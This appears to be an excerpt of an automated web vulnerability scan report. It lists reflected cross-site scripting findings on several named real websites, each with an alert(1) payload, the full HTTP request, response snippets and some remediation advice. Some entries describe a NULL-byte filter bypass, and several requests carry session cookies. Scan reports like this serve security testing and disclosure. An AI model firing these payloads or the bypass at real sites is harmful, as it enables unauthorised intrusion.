The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 13b1b'><script>alert(1)</script>dd03f420596 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/?13b1b'><script>alert(1)</script>dd03f420596=1 HTTP/1.1 Host: www.gamearena.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:fb="http://www.face ...[SNIP]... <a class="pageLink" href='/news/?13b1b'><script>alert(1)</script>dd03f420596=1&p=2'> ...[SNIP]...
2.721. http://www.gamearena.com.au/shop/games/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.gamearena.com.au
Path:
/shop/games/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9c467'><script>alert(1)</script>b78c9ab4d73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shop/games/?9c467'><script>alert(1)</script>b78c9ab4d73=1 HTTP/1.1 Host: www.gamearena.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec910'-alert(1)-'dec01b893fd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /shop/games/title/hearts-medicine-season-one/index.phpec910'-alert(1)-'dec01b893fd HTTP/1.1 Host: www.gamearena.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.723. http://www.gamearena.com.au/shop/games/title/hearts-medicine-season-one/index.php [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e692b'-alert(1)-'fea3d3cefb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /shop/games/title/hearts-medicine-season-one/index.php?e692b'-alert(1)-'fea3d3cefb9=1 HTTP/1.1 Host: www.gamearena.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f1d8'-alert(1)-'20c53a0686d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /shop/games/title/secret-diaries-florence-ashford/index.php7f1d8'-alert(1)-'20c53a0686d HTTP/1.1 Host: www.gamearena.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.725. http://www.gamearena.com.au/shop/games/title/secret-diaries-florence-ashford/index.php [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61ab5'-alert(1)-'95d0a350b7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /shop/games/title/secret-diaries-florence-ashford/index.php?61ab5'-alert(1)-'95d0a350b7d=1 HTTP/1.1 Host: www.gamearena.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83b93'-alert(1)-'1cbfd3fd174 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /shop/games/title/the-seawise-chronicles-untamed-legacy/index.php83b93'-alert(1)-'1cbfd3fd174 HTTP/1.1 Host: www.gamearena.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.727. http://www.gamearena.com.au/shop/games/title/the-seawise-chronicles-untamed-legacy/index.php [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7267'-alert(1)-'7c57df84a8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /shop/games/title/the-seawise-chronicles-untamed-legacy/index.php?c7267'-alert(1)-'7c57df84a8c=1 HTTP/1.1 Host: www.gamearena.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbf80'-alert(1)-'c1592b9858f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /shop/games/title/the-treasures-of-mystery-island-2-the-gates-of-fate/index.phpcbf80'-alert(1)-'c1592b9858f HTTP/1.1 Host: www.gamearena.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.729. http://www.gamearena.com.au/shop/games/title/the-treasures-of-mystery-island-2-the-gates-of-fate/index.php [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a8b7'-alert(1)-'15e83935456 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /shop/games/title/the-treasures-of-mystery-island-2-the-gates-of-fate/index.php?8a8b7'-alert(1)-'15e83935456=1 HTTP/1.1 Host: www.gamearena.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.730. http://www.gamearena.com.au/shop/mobile/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.gamearena.com.au
Path:
/shop/mobile/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 800b7'><script>alert(1)</script>ca0103945b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shop/mobile/?800b7'><script>alert(1)</script>ca0103945b1=1 HTTP/1.1 Host: www.gamearena.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13046"><script>alert(1)</script>4c16f852011 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shop/mobile/game.x/call-of-duty-black-ops-mobile/index.php13046"><script>alert(1)</script>4c16f852011 HTTP/1.1 Host: www.gamearena.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:fb="http://www.face ...[SNIP]... <input type="hidden" name="goto_url" value="/shop/mobile/game.x/call-of-duty-black-ops-mobile/index.php13046"><script>alert(1)</script>4c16f852011" /> ...[SNIP]...
2.732. http://www.gamearena.com.au/shop/mobile/game.x/call-of-duty-black-ops-mobile/index.php [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16cbc"><script>alert(1)</script>f7c9e714a11 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shop/mobile/game.x/call-of-duty-black-ops-mobile/index.php/16cbc"><script>alert(1)</script>f7c9e714a11 HTTP/1.1 Host: www.gamearena.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 53a36<script>alert(1)</script>6bf5967d185 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ops53a36<script>alert(1)</script>6bf5967d185/ HTTP/1.1 Host: www.telstra.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 02:31:46 GMT Server: Apache/2.0.49 (Linux/SuSE) Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 1589
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- saved from url=(0081)http://mws-w133894.cdn.telstra.com.au/bigpond/direct/telstra_standards/header.htm --> <!--Begin global jav ...[SNIP]... <p class="error">/ops53a36<script>alert(1)</script>6bf5967d185/ does not exist on this server.</p> ...[SNIP]...
2.734. http://www.utest.com/how-it-works/agile-testing [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.utest.com
Path:
/how-it-works/agile-testing
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b09b"><script>alert(1)</script>33e57d613e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /how-it-works/agile-testing?9b09b"><script>alert(1)</script>33e57d613e4=1 HTTP/1.1 Host: www.utest.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: has_js=1; mkeng_id=a418620f4ff42ce9be93ec1a721f6a25b9dc007f; __utmz=220800860.1290483926.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=220800860.1578714025.1290483926.1290483926.1290483926.1; __utmc=220800860; __utmb=220800860.5.10.1290483926; SESS3576489563ca528674cbb246a80a52f5=7f95e2f5eb9a0fc691280a1c52d12cc4;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:01:13 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Tue, 23 Nov 2010 03:01:13 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 51257
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
2.735. http://www.utest.com/intro [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.utest.com
Path:
/intro
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 180c8"><script>alert(1)</script>0467e4d206 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /intro?180c8"><script>alert(1)</script>0467e4d206=1 HTTP/1.1 Host: www.utest.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: has_js=1; mkeng_id=a418620f4ff42ce9be93ec1a721f6a25b9dc007f; __utmz=220800860.1290483926.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=220800860.1578714025.1290483926.1290483926.1290483926.1; __utmc=220800860; __utmb=220800860.5.10.1290483926; SESS3576489563ca528674cbb246a80a52f5=7f95e2f5eb9a0fc691280a1c52d12cc4;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 02:59:19 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Tue, 23 Nov 2010 02:59:19 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 48793
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
2.736. http://www.utest.com/meet-testers [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.utest.com
Path:
/meet-testers
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64356"><script>alert(1)</script>c5907c3867b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /meet-testers?64356"><script>alert(1)</script>c5907c3867b=1 HTTP/1.1 Host: www.utest.com Proxy-Connection: keep-alive Referer: http://www.utest.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS3576489563ca528674cbb246a80a52f5=7f95e2f5eb9a0fc691280a1c52d12cc4; mkeng_id=a418620f4ff42ce9be93ec1a721f6a25b9dc007f; has_js=1; __utmz=220800860.1290483926.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=220800860.1578714025.1290483926.1290483926.1290483926.1; __utmc=220800860; __utmb=220800860.1.10.1290483926
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 02:59:27 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Tue, 23 Nov 2010 02:59:27 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 53091
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
2.737. http://www.utest.com/pricing [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.utest.com
Path:
/pricing
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4357f"><script>alert(1)</script>9a6adc3ee95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pricing?4357f"><script>alert(1)</script>9a6adc3ee95=1 HTTP/1.1 Host: www.utest.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS3576489563ca528674cbb246a80a52f5=7f95e2f5eb9a0fc691280a1c52d12cc4; mkeng_id=a418620f4ff42ce9be93ec1a721f6a25b9dc007f; __utmz=220800860.1290483926.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); has_js=1; __utma=220800860.1578714025.1290483926.1290483926.1290483926.1; __utmc=220800860; __utmb=220800860.5.10.1290483926
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 02:59:29 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Tue, 23 Nov 2010 02:59:29 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 73504
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
2.738. http://www.utest.com/what-we-test/desktop-application-testing [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.utest.com
Path:
/what-we-test/desktop-application-testing
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94fae"><script>alert(1)</script>35cdcc305c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /what-we-test/desktop-application-testing?94fae"><script>alert(1)</script>35cdcc305c9=1 HTTP/1.1 Host: www.utest.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: has_js=1; mkeng_id=a418620f4ff42ce9be93ec1a721f6a25b9dc007f; __utmz=220800860.1290483926.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=220800860.1578714025.1290483926.1290483926.1290483926.1; __utmc=220800860; __utmb=220800860.5.10.1290483926; SESS3576489563ca528674cbb246a80a52f5=7f95e2f5eb9a0fc691280a1c52d12cc4;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:01:32 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Tue, 23 Nov 2010 03:01:32 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 53080
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
2.739. http://www.utest.com/what-we-test/gaming-application-testing [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.utest.com
Path:
/what-we-test/gaming-application-testing
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18c74"><script>alert(1)</script>0829c5bcbc3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /what-we-test/gaming-application-testing?18c74"><script>alert(1)</script>0829c5bcbc3=1 HTTP/1.1 Host: www.utest.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: has_js=1; mkeng_id=a418620f4ff42ce9be93ec1a721f6a25b9dc007f; __utmz=220800860.1290483926.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=220800860.1578714025.1290483926.1290483926.1290483926.1; __utmc=220800860; __utmb=220800860.5.10.1290483926; SESS3576489563ca528674cbb246a80a52f5=7f95e2f5eb9a0fc691280a1c52d12cc4;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:01:31 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Tue, 23 Nov 2010 03:01:31 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 51969
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
2.740. http://www.virtualmedicalcentre.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.virtualmedicalcentre.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21bba"><script>alert(1)</script>10e5e8898c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /?21bba"><script>alert(1)</script>10e5e8898c1=1 HTTP/1.1 Host: www.virtualmedicalcentre.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Tue, 23 Nov 2010 02:45:26 GMT X-Powered-By: ASP.NET P3P: CP="OUR" Set-Cookie: statctr=med; path=/ Set-Cookie: vmcsessionid=%7B7AA442D0%2D86BA%2D42B9%2D9313%2DD056B5BDDDCC%7D; expires=Wed, 24-Nov-2010 13:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDSAADQBSS=FAKEAHHBPJLLFCGKCNBGOLAI; path=/ Date: Tue, 23 Nov 2010 02:45:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <link href="/master/c ...[SNIP]... <meta name="DC.Identifier" scheme="URI" content="http://www.virtualmedicalcentre.com/Default.asp?21bba"><script>alert(1)</script>10e5e8898c1=1" /> ...[SNIP]...
2.741. http://www.virtualmedicalcentre.com/calc.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.virtualmedicalcentre.com
Path:
/calc.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26c65"><script>alert(1)</script>e3cde7c40f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /calc.asp?26c65"><script>alert(1)</script>e3cde7c40f=1 HTTP/1.1 Host: www.virtualmedicalcentre.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Tue, 23 Nov 2010 02:45:30 GMT X-Powered-By: ASP.NET P3P: CP="OUR" Set-Cookie: vmcsessionid=%7B9E70432A%2D8A75%2D4CA8%2DAEBF%2D7CF51C2B39ED%7D; expires=Wed, 24-Nov-2010 13:00:00 GMT; path=/ Set-Cookie: statctr=med; path=/ Set-Cookie: ASPSESSIONIDSAADQBSS=ACKEAHHBMPOEGKMKCJKDCLFF; path=/ Date: Tue, 23 Nov 2010 02:45:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <link href="/master/c ...[SNIP]... <meta name="DC.Identifier" scheme="URI" content="http://www.virtualmedicalcentre.com/calc.asp?26c65"><script>alert(1)</script>e3cde7c40f=1" /> ...[SNIP]...
2.742. http://www.virtualmedicalcentre.com/caloriecounter.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.virtualmedicalcentre.com
Path:
/caloriecounter.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 508ba"><script>alert(1)</script>dd880f1b34a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /caloriecounter.asp?508ba"><script>alert(1)</script>dd880f1b34a=1 HTTP/1.1 Host: www.virtualmedicalcentre.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 218665 Content-Type: text/html Expires: Tue, 23 Nov 2010 02:45:32 GMT X-Powered-By: ASP.NET P3P: CP="OUR" Set-Cookie: vmcsessionid=%7BB8D019A4%2DC242%2D4F41%2DA339%2DA310FFBA94CF%7D; expires=Wed, 24-Nov-2010 13:00:00 GMT; path=/ Set-Cookie: statctr=med; path=/ Set-Cookie: ASPSESSIONIDSAADQBSS=JCKEAHHBDKJLDCECFMHFCBBG; path=/ Date: Tue, 23 Nov 2010 02:45:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <link href="/master/c ...[SNIP]... <meta name="DC.Identifier" scheme="URI" content="http://www.virtualmedicalcentre.com/caloriecounter.asp?508ba"><script>alert(1)</script>dd880f1b34a=1" /> ...[SNIP]...
2.743. http://www.virtualmedicalcentre.com/caloriecounter.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.virtualmedicalcentre.com
Path:
/caloriecounter.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a034a"><script>alert(1)</script>9c84818be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
